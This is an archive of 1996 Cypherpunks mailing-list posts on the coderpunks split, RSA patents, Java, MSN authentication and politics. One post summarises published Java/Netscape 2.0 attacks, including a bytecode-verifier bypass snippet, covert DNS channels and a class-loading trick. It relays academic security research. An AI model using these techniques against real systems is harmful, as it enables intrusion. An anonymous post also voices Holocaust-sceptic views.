-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Apr 1996 07:02:49 -0700 (PDT)
To: tcmay@got.net (Timothy C. May)
Subject: Cypherpunks: Cesspit? (was Re: Mindshare and Java)
In-Reply-To: <ada43daa150210045c4d@[205.199.118.202]>
Message-ID: <199604251402.KAA27368@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> Well, I was not invited to join the elite and secret coderpunks
> list,

It is neither elite nor secret. It is fairly high signal to noise. I
think only about one in every fifty or so cypherpunks messages has any
content at all worth mentioning.

> but I still have some thoughts on coding and, especially, on the
> opportunities offered by Java. Sorry if this interferes with
> discussions of Rabbi Heir and Morris Dees.

You have no right to grumble about the situation here. It is exactly
what you wanted. Here you were, a person of some personal gravitas and
moral authority, and you put your stamp on the "post whatever you
like; don't let the grumbling censors stop you". Well, as you sow, so
shall you reap. Its your fault, more than anyone else's.

> [It is my firm opinion that the creation of a separate mailing list to
> discuss only coding or software issues is a mistake.

Unfortunately, most of the smart coders had been driven out of this
cesspit by the noise levels, so it was the only choice left.

> Basically, it is easier to filter-reduce a large group, such as with
> "[CODE]" prefixes or by reputations,

Actually, it isn't easier. I've tried filtering cypherpunks and its
damn hard. Doing it right would require much more AI than we have
access to.

> And there is another important point, that the
> Cypherpunks/Coderpunks split is producing the expected result: the
> Cypherpunks are rapidly losing any remaining anchors to
> technical/programming issues and are thus becoming almost wholly
> politics-driven. While I am of course highly motivated by political
> issues, they must be grounded in technical issues

As I recall, Mr. May, you were arguing against my continued attempts
to keep some semblance of technical discussion continuing on
Cypherpunks. The occassional attempt by me to turn things in a
technical direction was met by posts from you to the effect of "this
isn't coderpunks, get that technical stuff out of here". In jest or
no, I got sick of dealing with it.

I didn't want to see the split, but at least now there is a place I
can have discussions with smart crypto software coders. None of them
could tolerate Cypherpunks any longer. If Cypherpunks has become a
cesspit, well, its YOUR cesspit, Tim. Its the list you always strove
to create, but it appears that you now don't like the smell of your
own wallow. Well, sorry. Deal with it.

> I can't say what's happening on the coderpunks list, but my suspicion is
> that many of the coderpunks-only readers are analogously disconnected from
> ideological/political issues and think, perhaps, that the main purpose of
> the list (and of Cypherpunks) is to discuss compiler optimizations for PGP
> source code.

No, most of them are highly political. They just don't see any reason
to blather on about the same stuff over and over and over and over
when there is work to be done. Those that never do work may not
understand this principle, of course.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 25 Apr 1996 11:10:46 -0700 (PDT)
To: cypherpunks@toad.com
Subject: coderpunks not elite
Message-ID: <199604251714.KAA22305@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: tcmay@got.net (Timothy C. May)
> Well, I was not invited to join the elite and secret coderpunks list, but I
> still have some thoughts on coding and, especially, on the opportunities
> offered by Java.

As far as I know, the coderpunks list is neither secret nor elite.  I
joined it about a month ago, andd there wasn't any problem.  Just send
mail to majordomo@toad.com saying "subscribe coderpunks".  It's just as
easy as cypherpunks.

According to majordomo, coderpunks has 355 subscribers, compared to 1284
for cypherpunks.  These numbers are hardly representative of an elite
list.

The biggest difference between the lists is volume.  Some days coderpunks
gets a dozen or more messages, but for the last two or three days for
example there haven't been any at all.

The other difference of course is that coderpunks is for technical
discussions.  Where philosophy comes up it is more in terms of issues of
security and reliability than politics.

I do share Tim's concern about the political views of coderpunks
subscribers.  Despite the "punks" in the name it seems to be somewhat
more of a mainstream group.  Nevertheless I am determined to act as
though the group favors unlimited access to privacy tools by individuals
and to post under that assumption.  If it comes to the point that someone
complains there may have to be some air clearing but I don't think it's
likely to come up.

If the archives at hks.net ever come back people could take a look and
see if they would be interested in subscribing.  Mostly the discussions
are pretty dry.  A lot of them are on specific issues that are of
interest probably to only a few people.  It remains to be seen really
whether the list can sustain itself.  This has been the problem in the
past with offspring lists.

Cypherpunks continues to have a lot of vitality.  What I object to most
is the back and forth arguments people get into.  I don't mind reading
one message off-topic, but to have the thread drag on for days, with
dozens of messages, is wasteful.  People should just make their points
and let them stand.  They shouldn't feel they have to keep coming back
and refuting the other guy.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 25 Apr 1996 07:36:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: International Capital Flows Called Criminal
Message-ID: <2.2.32.19960425143051.0071b1bc@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Financial Times, April 24, 1996, p. 8.


   US prosecutor attacks bank secrecy laws

   By Clay Harris

 Mr John Moscow, assistant district attorney for Manhattan:

 "Bank secrecy statutes in international finance are used by
   crooks, tax evaders, securities fraudsters, and capital
   flight fellows; they are used by narcotics dealers. But
   they are not needed by honest folks engaged in honest
   transactions."

Now the last time I looked, 'Capital Flight' was as legal as church on a
Sunday.  Or is this a proposal for exchange controls.  Is this guy a state
or federal prosecutor?  He was also unable to come up with legitimate
reasons for $3 Billion to go from Egypt to the Bahamas.  I can think of any
one of a number of legal reasons, one being "International Tax Planning."

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Thu, 25 Apr 1996 08:08:47 -0700 (PDT)
To: "'Rich Graves'" <llurch@networking.stanford.edu>
Subject: RE: Mindshare and Java
Message-ID: <01BB3297.78880050@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> I agree that the major innovation, and cypherpunk opportunity, of Java is
> in its cross-platform nature, not its vaunted ability to run untrusted
> code safely. I'm sorry, I'm just not interested in running untrusted code. 
> Give me digitally signed code that I can trust, or for which the author 
> can at least be held accountable, and I'll be happy. 

Absolutely!

> As cool as many of the people on the Java team are, though, I am dubious
> that Java is going to live up to the hype. It is still not clear to me
> that Microsoft is going to support it seriously in their browser, which by
> mid-1997 will be so tightly integrated with the lowest-common-denominator
> operating system that there will be no room for Netscape.

There was an official announcement at their Professional Developers Conference
a few weeks back.  In short, full support in the browsers (and apparently MS 
is now the keeper of the reference implementation on Win32) and also
a full blown Java development environment code-named 'Jakarta'.

-Blake





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 25 Apr 1996 11:10:22 -0700 (PDT)
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Golden Key Campaign
Message-ID: <199604251810.LAA17469@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:11 AM 4/25/96 -0700, Bill Stewart wrote:
>At 02:22 PM 4/24/96 -0700, Wei Dai <weidai@eskimo.com> wrote:
>>On Wed, 24 Apr 1996, Hal wrote:
>>You can do signatures with Rabin too.  I have a version of it in
>>Crypto++ 2.0.  It's been out for a while and RSA hasn't bothered me about
>>it.
>>Does anyone want to explain why, given the alternatives, people continue
>>to use RSA and pay for it?
>
>Sure.  Because 1) it's a good algorithm for the job,
>2) we've learned it, and have a PGP base behind our inertia,
>3) The legalities of RSA are well-defined,
>4) the Stanford patents mostly run out in 1997, unless Roger's suit
>        succeeds first,
>5) the price of RSA is fairly low, once free RSAREF came out
>6) the price of licensing Cylink patents is high and/or unpredictable

I will add to Bill's list:

7) RSA is the best known and vetted of the Public Key algorithms.

Some people say that the millennium comes on Jan 1, 2000.  Others say it
comes on January 1, 2001.  I say it comes on September 20, 2000 when the
RSA patent expires.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 25 Apr 1996 11:44:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Java security weaknesses
Message-ID: <199604251842.LAA27897@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a quick summary of the attacks listed in "Java Security: From
HotJava to Netscape and Beyond", by Drew Dean, Edward W. Felten,
and Dan S. Wallach, Department of Computer Science, Princeton
University. <URL: http://www.cs.princeton.edu/sip/pub/secure96.html >.

Only attacks on Netscape will be listed here.  Several more were found
in HotJava, but that product is moribund at present.  The version of
Netscape used is 2.0.


Denial of service attacks

    Busy-wait to consume CPU cycles

    Allocate memory until no more is available

    Lock crucial system classes, e.g. java.net.INetAddress.  Blocks
    all hostname lookups.  Several other classes are suitable for this
    attack.

    Denial of service attacks can be moderated to degradation of service,
    possibly after a time delay, to make someone else's product look bad.


Covert Channels

    Can send mail via an SMTP port on server

    Lookup fictitious DNS name to send out info

    Tell browser to access fictitious URL (can be redirected back)


Information available to applets

    Can benchmark machine by reading system clock

    Java hashcode() defaults to address of object, might leak some info


Implementation errors

    DNS hack allowing connections to any machine (has been patched)

    Java disassembler (javap) has buffer overflows (not normally run by
    users)


Inter-Applet security

    Applets running from previous pages can learn of new applets by
    getting a handle to the top-level ThreadGroup and enumerating every
    thread running in the system.

    Can then call stop() and setPriority() on threads belonging to other
    applets, making them appear slow and unreliable.


Bytecode problem

    The big one: Java bytecode safety checker doesn't detect illegality of

    constructor()
    {
	try { super() } catch (Exception e) {}
    }

    This is not legal in the language - super() must not be called in a
    try clause.  But the bytecode checker erroneously allows it.

    This allows subclasses of privileged system classes to be created.
    Normally those classes throw an exception in their constructor so they
    can't be instantiated.  But this trick allows it.

    This way users can create their own ClassLoaders, SecurityManagers,
    etc.  By creating a hacked ClassLoader the Java class type system can
    be defeated by resolving different classes against each other.  Any
    non static variable can be set, any public method can be called,
    including native methods.  The security is gone.


Package name problem

    If the first character of a package name is / the system will attempt to
    load code from an absolute path, which would be trusted since it comes
    from the local disk.  Any Java class which the attacker can get onto
    the user's disk can then be loaded in trusted mode.  Classes can be
    gotten onto disk simply by fetching URL's in Netscape, which puts them
    into its cache.  If you can figure out Netscape's class naming scheme
    you can then run any class, trusted.  (I think this one has been
    patched.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 25 Apr 1996 11:49:47 -0700 (PDT)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Mindshare and Java
In-Reply-To: <ada43daa150210045c4d@[205.199.118.202]>
Message-ID: <199604251849.LAA16561@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




TCM:
>
>Well, I was not invited to join the elite and secret coderpunks list, but I
>still have some thoughts on coding and, especially, on the opportunities
>offered by Java. Sorry if this interferes with discussions of Rabbi Heir
>and Morris Dees.

hey, that's horrible. well, consider this an invitation. "we" would
love to see you post there. but you've written disparagely about
people that like to code in the past here, so "we're" not sure how
much you will like the list.

>[It is my firm opinion that the creation of a separate mailing list to
>discuss only coding or software issues is a mistake. For several reasons,
>which I can discuss at lenght in a separate message. Basically, it is
>easier to filter-reduce a large group, such as with "[CODE]" prefixes or by
>reputations, than it is to filter-expand a moribund group! :-}

that's pretty amusing. I thought I saw a long msg from you about how these
prefixes were mostly a waste of time based on your experience on the
Extroprian list.

 I've seen
>many sub-critical mass list become moribund. And there is another important
>point, that the Cypherpunks/Coderpunks split is producing the expected
>result: the Cypherpunks are rapidly losing any remaining anchors to
>technical/programming issues and are thus becoming almost wholly
>politics-driven.

whoa, you don't know that. a little bit of a leap of faith there. the
cpunk list has always been awash in froth almost from its beginning.
people are always whining about its loss of S/N but it has always been
an awful lot of flotsam and jetsam.

 While I am of course highly motivated by political issues,
>they must be grounded in technical issues (else we are just another
>anti-CDA, anti-censorship, anarcho-capitalist, libertarian ranting group).

hee, hee. the pendulum swings back. first message I have seen in which
you get out of the defensive, "anti-CDA, anti-censorship, anarcho-capitalist,
libertarian rants are right on target here on the cpunk list and don't
let boneheads like PM argue with you about it."

>I can't say what's happening on the coderpunks list, but my suspicion is
>that many of the coderpunks-only readers are analogously disconnected from
>ideological/political issues and think, perhaps, that the main purpose of
>the list (and of Cypherpunks) is to discuss compiler optimizations for PGP
>source code.

suspicion is a funny thing. people who are paranoid can be manipulated
to channel their fears into useful effects. in a place where a lot
of people are paranoid, you can even get a sort of chain reaction of
paranoia. (as in the recent message, "YAAAAH!! we're being DETWEILED!!!")

 It is sad to see the Cypherpunks lose its grounding. Maybe in
>a few months, the coderpunks will simply declare victory, dissolve the
>Cypherpunks list, and rename themselves, a la coderpunks = cypherpunks++.)

cypherpunks, a barely "grounded" thing to begin with, "lose its
grounding"? what about you, the premiere advocate of free choice and
letting a thousand mailing lists bloom? oh, when one becomes SUCCESSFUL,
then its a problem. I see. I thought there was "no such thing as the 
cypherpunks"? there is no "group" to begin with? I never thought I would see 
you cheerleeding for "cypherpunk unity."

>But I come not to bury Cypherpunks, I come to praise Java.

the rest of your post was not interesting to me so I'll refrain from
commenting. <g>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypherpunks@count04.mry.scruznet.com
Date: Wed, 24 Apr 1996 14:38:16 -0700 (PDT)
To: wb8foz@nrk.com
Subject: Re: EYE_suk
In-Reply-To: <199604241225.IAA05345@nrk.com>
Message-ID: <199604251859.LAA28220@count04.mry.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain



  >Subject: Re: EYE_suk
  >To: ses@tipper.oit.unc.edu (Simon Spero)
  >Date: Wed, 24 Apr 1996 08:25:23 -0400 (EDT)
  >Cc: cypherpunks@toad.com (Cypherpunks)
  >In-Reply-To: <Pine.SOL.3.91.960423221718.19976A-100000@chivalry> from "Simon Spero" at Apr 23, 96 10:18:37 pm
  >Reply-To: wb8foz@nrk.com
  >Content-Type: text
  >Sender: owner-cypherpunks@toad.com
  >Precedence: bulk
  >
  >> 
  >> 
  >> > 	Isn't the CIA forbidden from doing anything on US soil?
  >> 
  >> That'd make cointel a little tricky :-) 
  >> Simon
  >
  >Errr,
  >That is the Feeb's department, & they guard it like the family
  >jewels.....
  >



    BZZT!!! wrong answer since 1981 on december 4  when president reagan
signed it into Executive Order #12333  TLA's(those intelligence
agencies having strictly offshore charters CIA,NSA others) have been permitted
to operate domestically in cases of National Security(or involvement with 
persons suspected of being agents for foreign entities) and Drug War issues.
Formerly it was simply illegal but since the intel community had taken
such a hard hit during the church subcommittee hearings of the 1970's
the new tactic was to acquire legitimacy for black ops on domestic fronts
thus the above EO was shoved under reagans nose quickly...

The reference to the above EO may be found in the "CIA off Campus" booklet
by the Bill of Rights Foundation on page 134-135
ISBN 0-89608-404-3 (c) 1991 by Amy Chen Mills and the Bill of Rights
foundation.
Get it its a fascinating read!!..

   cheers
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 25 Apr 1996 12:09:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Golden Key Campaign
Message-ID: <199604251908.MAA29335@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: frantz@netcom.com (Bill Frantz)
> Some people say that the millennium comes on Jan 1, 2000.  Others say it
> comes on January 1, 2001.  I say it comes on September 20, 2000 when the
> RSA patent expires.

It is traditional to commemorate big events with annual observances.  I
say there's no reason the observances can't predate the event when it is
known in advance.

So I propose that September 20 be known as Crypto Freedom Day, and an
annual celebration be held on that day.  With each year closer to 2000
the party gets bigger, culminating on the day that the patent actually
expires.  We can all run our RSA in three lines of Java that Adam Back
will have prepared, and taste for the first time the freedom which the
rest of the world will have known for the past 17 years.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Microsoft Internet Announcements <inetannc@microsoft.com>
Date: Thu, 25 Apr 1996 12:13:04 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: ANNOUNCE: new Microsoft Code Signing mailing list
Message-ID: <c=US%a=_%p=msft%l=RED-89-MSG-960425191031Z-15313@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


CodeSign on ListAdmin@lists.msn.com

CodeSign is a mailing list (discussion list) for discussions on
Microsoft's Windows Trust Verification Services, a set of API's which
determine whether a software component contains digital certificates
that identify it as being authentic software released by a publisher
trusted on the local user's system.  For more information about Code
Signing, see <http://www.microsoft.com/intdev/>.  

You can subscribe to the regular mailing list or a digest version. To
subscribe, send e-mail to ListAdmin@lists.msn.com with the following
text in the message body (not subject line):

    subscribe CodeSign your@email.address
or
    digest CodeSign your@email.address

where your@mail.address is your actual e-mail address (don't just use
"your@mail.address").

To unsubscribe, send e-mail to ListAdmin@lists.msn.com with the
following text in the message body (not subject line):

    unsubscribe CodeSign your@email.address

To send a message to the subscribers of the list, send e-mail to
CodeSign@lists.msn.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 25 Apr 1996 12:54:15 -0700 (PDT)
To: "cypherpunks@toad.com>
Subject: RE: Mindshare and Java
In-Reply-To: <01BB3297.78880050@bcdev.com>
Message-ID: <Pine.GUL.3.93.960425125045.27532C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Apr 1996, Blake Coverett wrote:

> There was an official announcement at their Professional Developers
> Conference a few weeks back.  In short, full support in the browsers
> (and apparently MS is now the keeper of the reference implementation on
> Win32) and also a full blown Java development environment code-named
> 'Jakarta'.

Yes, I had the misfortune to post that skeptical bit at precisely the same
moment that the public press releases were proving me wrong :-(

My source at the PDC indicated that Microsoft was still pushing Visual
Basic, but I'll accept that there's been a change... 

Still, integrating Java and Internet browsing into the OS does not bode
well for Netscape. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 25 Apr 1996 13:23:18 -0700 (PDT)
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Mindshare and Java
Message-ID: <199604252023.NAA00294@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 PM 4/24/96 -0700, Rich Graves wrote:
>I agree that the major innovation, and cypherpunk opportunity, of Java is
>in its cross-platform nature, not its vaunted ability to run untrusted
>code safely. I'm sorry, I'm just not interested in running untrusted code. 
>Give me digitally signed code that I can trust, or for which the author 
>can at least be held accountable, and I'll be happy. 

I, for one, am interested in running untrusted code.  If I can run
untrusted code, I can greatly reduce my exposure to Trojan horses and bugs.
 It bothers me that if I run Microsoft Word, it can trash my MacWrite
files.  Even if I get these programs from reputable dealers, in original
shrink-wrap boxes, so I have good reason to believe I know who the author
is, I am still exposed to these problems.

I should note that Java's one-straitjacket-fits-all approach to running
untrusted programs is not adequate to satisfy my desires.  However, it is a
start, and it does run in todays complex Input Output Control Systems that
have been misnamed "Operating Systems".  (If it can't enforce a security
policy, it isn't an Operating System.)

I would rather use technological means to prevent damage than legal means.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 25 Apr 1996 13:49:13 -0700 (PDT)
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: [NOISE] The Iron Mountain Report
Message-ID: <199604252049.NAA22863@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 4/24/96 -0700, Rich Graves wrote:
>The author of the Iron Mountain Report was interviewed on PBS a few weeks
>ago. It was a really over-the-top parody published in 1967.

That's _Nationalized_ Public Radio; any conspiracy that couldn't get
somebody on their denying that they were the secret power behind the 
government is obviously not competent to be the _real_ secret power
behind the government.  The interview just shows how pervasive they are. :-)

Meanwhile, Robert Ludlum's got a new book out, doing another
"hidden Nazis-will-rise-again" conspiracy.  It's ok, though not
as good as his best work.  Among other events, the disinformation
leaked out by the Neo-Nazis frames many prominent people as Nazis,
a critical few of whom really are.  And there's a bad parody of a
fat talk-show host somewhat to the right of Attila the Hun
(Caller: "Double whippo, Arnie!") who gets framed on the air...


>Every once in a while, I get mail asking whether I really have contacts in
>Sendero Luminoso, since a bit of satire I wrote was quoted in the Web
>Review (which made no attempt to contact me before printing the satire as
>my position). 

Foo - even I've had contacts in the Sendero Luminoso, though they
all would have strictly denied it - they were just "good Socialist
college students" and "immigrant refugees" from Peru, which _does_ have
a fairly brutal and sleazy elected dictator.  Not everybody in the
anti-war business is pro-peace.

>Truth is far more fragile than fiction.
Sure, cause fiction's supposed to make sense.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lee Fisher <leefi@microsoft.com>
Date: Thu, 25 Apr 1996 13:55:46 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Re: Hack MSN anyone?
Message-ID: <c=US%a=_%p=msft%l=RED-09-MSG-960425205348Z-73431@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


I was curious about the below message, and checked... 

MSN uses CHAP (PPP's challenge-response handshake) for network layer
authetication, and NTLM (Windows NT's challenge-response handshake) for
application-layer authentication. The password is never sent in across
the network. Challenge-responses encrypted with the password are sent.

Lee Fisher

| The names have been changed to protect the innocent...
| I need say no more I'm sure.
|
|| Yes, windows95 dialup networking uses compression to send the
password
|| when connecting. Thanks for using the Microsoft Network
||
||| Problem Description: Microsoft being security conscious and all, I
||| would hope that when I connect to MSN over the Internet, that my MSN
||| client has the decency to ENCRYPT my password when it sends it over
the
||| net,  yes?  This is the first time I couldn't get through to a
dial-up
||| connection and had to access MSN using my ISP.  Having done so, I
find
||| it extrememly convenient, and would like to continue to do so. 
Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: us028272@interramp.com (Jeffrey C. Flynn)
Date: Thu, 25 Apr 1996 10:54:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: trusting the processor chip
Message-ID: <v01530502630b72c54a12@[38.12.221.41]>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Mar 1996, JEFF C FLYNN wrote:

> Does anyone know of articles regarding the possibility of subverting
> processor chips?  Is this a realistic threat?  Is it possible to hack vhdl
> compilers to embed intentional security flaws in silicon?  Known cases?
> Attempts?
> TIA,
> Jeff

I received several responses to this question.  My favorite was as follows...

>This is probably science fiction, particularly at the VHDL level.
>Maybe someone could make a crime of opportunity out of a microcode
>flaw, but there's a risk of it being found out during testing.
>
>To do it right would require collusion of the design and test teams.
>They need to ensure the back door stays closed, isn't tickled by
>"normal" testing and only opens when really requested. So a lot of
>people are in on the secret even before it gets exploited for
>nefarious purposes.
>
>And what nefarious purposes would pay for the risks and costs of this?
>If the secret got out, the design team, product line, and company
>would be dead in the marketplace and probably spend the rest of their
>lives responding to lawsuits. What could you use this for that is
>worth the risk?
>
>Trying to do it to the compiler (like Thompson inserting a back door
>in login using the Unix C compiler) is, again, theoretically possible.
>But the only reason to hack the compiler would be to do the deed
>without involving the processor development team. Risky in terms of
>building a reliable back door and the risk of detection. It might not
>work and the changes might be detected. To do it right would probably
>involve as many technical people as the processor development itself.
>Even "high grade threats" have finite resources -- there aren't that
>many processor design gurus in the world to start with.
>
>At best, this might make a good plot element for Tom Clancy.>
>
>Rick.
>smith@sctc.com         secure computing corporation

Still, I'm left feeling a little uneasy.
My reasons for this are

1) Trusting the processor means trusting something I don't fully understand.
2) Processors these days are extremely complex.
3) On April 3rd, at Interop, Peter Neumann (in his keynote presentation)
disclosed that a random number generator chip used in slot machines had
been compromised.  This lead to a huge bogus jackpot, and an investigation
that revealed the scheme.

It looks like I may have no other option than to give some processor some
degree of trust. Which processor I should choose, and why that one?

TIA,
Jeff

_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

             Specializing in the Design and Implementation of
                             SECURE NETWORKS



                        JEFF FLYNN & ASSOCIATES
                      NETWORK SECURITY CONSULTING



19 PERRYVILLE
IRVINE, CALIF.    92720                                        JEFF FLYNN
TELEPHONE (714)551-6398                                         PRINCIPAL

_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 25 Apr 1996 13:54:36 -0700 (PDT)
To: perry@piermont.com
Subject: Re: Golden Key Campaign
Message-ID: <199604252054.NAA03146@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:27 PM 4/25/96 -0400, Perry E. Metzger wrote:
>Bill Frantz writes:
>> I will add to Bill's list:
>> 
>> 7) RSA is the best known and vetted of the Public Key algorithms.
>
>Nota at all, Mr. Frantz. There are no proofs of security associated
>with RSA. Rabin has excellent proofs that breaking a message is
>strictly equivalent to factoring.

I do not equate good vetting with proofs of security.  Given the Verona
intercepts, I don't think there are any valid proofs of the security of
complete crypto-systems.  While anyone who can factor RSA keys can break
RSA, factoring has been intensively studied since RSA was published.  The
public information says that in spite of improvements, factoring is still a
hard problem.  If people in Maryland can factor big RSA keys, they're Not
Saying Anything.

So far, I'll stand by my two contentions:

7a) RSA is the best known public key algorithm.
7b) RSA is the best vetted public key algorithm.

Do you have any counter examples to help me change my mind?


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 25 Apr 1996 06:08:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Nazis on the Net
Message-ID: <199604251236.OAA09404@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



EALLENSMITH@ocelot.Rutgers.EDU writes:
| Abraham Lincoln is one reason I _don't_ use the above definition; by mine,
| he'd be a separatist (wanted to move Blacks to Liberia, if I recall correctly).
| I trust that everyone involved in this discussion (with the exception of the
| neo-Nazi) would agree that Abraham Lincoln was better than those in the South
| who wanted to keep blacks enslaved?

Do we have a neo-Nazi in this discussion??  Are you implying that any sceptic
of a few Holocaust `facts' is a neo-Nazi??  Do you infer that all pro-lifers
are Republicans??

It is because of such baseless inferences, I have to remain anonymous.  I would
dearly love to debate under my real name, but am prevented from doing so by the
neo-Nazi name-calling.

Yes you are correct, I disagree that Abraham Lincoln was better than those in
the South, not for racial reasons (remember, the Civil War was *not* about
slavery, because the slavery issue only arised *after* the war started), but
because I believe that a diverse set of countries is `better' than one.  I
believe that countries that want independence (such as Chechnya) should have
it.  (Yes, I am likening Abe Lincoln to Boris Yeltsin).

[ You may also like to consider that blacks as well as whites fought for the
South. ]

---
``The believer is happy. The doubter is wise''.  -  Hungarian proverb







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 25 Apr 1996 14:45:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [NOISE] The Iron Mountain Report
In-Reply-To: <199604252049.NAA22863@toad.com>
Message-ID: <Pine.GUL.3.93.960425143326.27532H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Apr 1996, Bill Stewart wrote:

> Meanwhile, Robert Ludlum's got a new book out, doing another
> "hidden Nazis-will-rise-again" conspiracy.  It's ok, though not
> as good as his best work.  Among other events, the disinformation
> leaked out by the Neo-Nazis frames many prominent people as Nazis,
> a critical few of whom really are.  And there's a bad parody of a
> fat talk-show host somewhat to the right of Attila the Hun
> (Caller: "Double whippo, Arnie!") who gets framed on the air...

That's funny; maybe I'll check it out in my spare time. Yeah, right.

The scary thing is, there are people who actually BELIEVE that shit. Or,
from the "other side," Clancy's rants, or The Turner Diaries, or Marx's
poor algebra in Das Kapital. You shouldn't base your life on fiction.

I'd guess that there are no more than 5,000 serious Nazis left in the
whole world who actually favor totalitarianism and genocide. It's quite
obvious who they are. They're not a threat, but it's probably good to
harry them, because otherwise, they might become a threat. (The 5K
estimate does *not* include other totalitarian/genocidal movements, and
I'm not interested in debating parallels. When I say "Nazi," which is
pretty rare, I mean "Nazi," someone who has read and agrees with the
"Nation and Race" chapter of Mein Kampf.)

Disinformation is stronger than a lot of people think. Or maybe I'm just
saying that :-)

> Foo - even I've had contacts in the Sendero Luminoso, though they
> all would have strictly denied it - they were just "good Socialist
> college students" and "immigrant refugees" from Peru, which _does_ have
> a fairly brutal and sleazy elected dictator.  Not everybody in the
> anti-war business is pro-peace.

My academic work involved Latin American revolutionary movements. I have
some idea.

> >Truth is far more fragile than fiction.
> Sure, cause fiction's supposed to make sense.

Never thought of it that way, but I believe that's the crux of the
problem...

-rich
 http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 25 Apr 1996 14:56:11 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Re: Hack MSN anyone?
In-Reply-To: <c=US%a=_%p=msft%l=RED-09-MSG-960425205348Z-73431@tide19.microsoft.com>
Message-ID: <Pine.GUL.3.93.960425145006.27532I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Apr 1996, Lee Fisher wrote:

> I was curious about the below message, and checked...
> 
